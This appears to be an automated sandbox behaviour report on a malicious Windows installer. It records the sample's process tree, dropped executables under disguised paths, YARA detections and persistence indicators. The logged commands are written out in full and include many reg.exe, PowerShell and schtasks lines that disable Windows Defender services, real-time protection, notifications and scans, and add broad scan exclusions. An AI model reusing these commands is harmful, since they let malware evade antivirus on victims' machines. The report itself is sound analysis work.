Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 /nobreak
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\user\Appdata\Local" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: JWQgbclQK5

Static file information: File size 33220376 > 1048576

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 00000037.00000002.1817217674.0000000004DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1802305485.0000000003035000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1951876750.0000000007470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1879276919.0000000006654000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.1879276919.0000000006141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000076.00000002.2429256257.00000000031F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000078.00000002.2419373692.000001B22960C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000078.00000002.2419373692.000001B22973A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

PE file contains sections with non-standard names

Source: JWQgbclQK5

Static PE information: section name: .sxdata

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe	Executable created and started: C:\Windows\Installer\MSIBF81.tmp
Source: C:\Windows\System32\msiexec.exe	Executable created and started: C:\Windows\Installer\MSI551D.tmp
Source: C:\Windows\System32\msiexec.exe	Executable created and started: C:\Windows\Installer\MSIBFC2.tmp
Source: C:\Windows\System32\msiexec.exe	Executable created and started: C:\Windows\Installer\MSIBF92.tmp

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC26F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC30F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBFC2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	File created: C:\Users\user\AppData\Local\Temp\shi3348.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBF92.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC28.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\networkbroker.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI12E1.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC2DF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF889.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC26F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC30F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBFC2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBF92.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC28.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI12E1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC2DF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF889.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\License.txt
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\LICENSE.txt
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\LICENSE-MIT.txt
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\wrap-ansi\node_modules\emoji-regex\LICENSE-MIT.txt
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	File created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\readme.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\JWQgbclQK5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
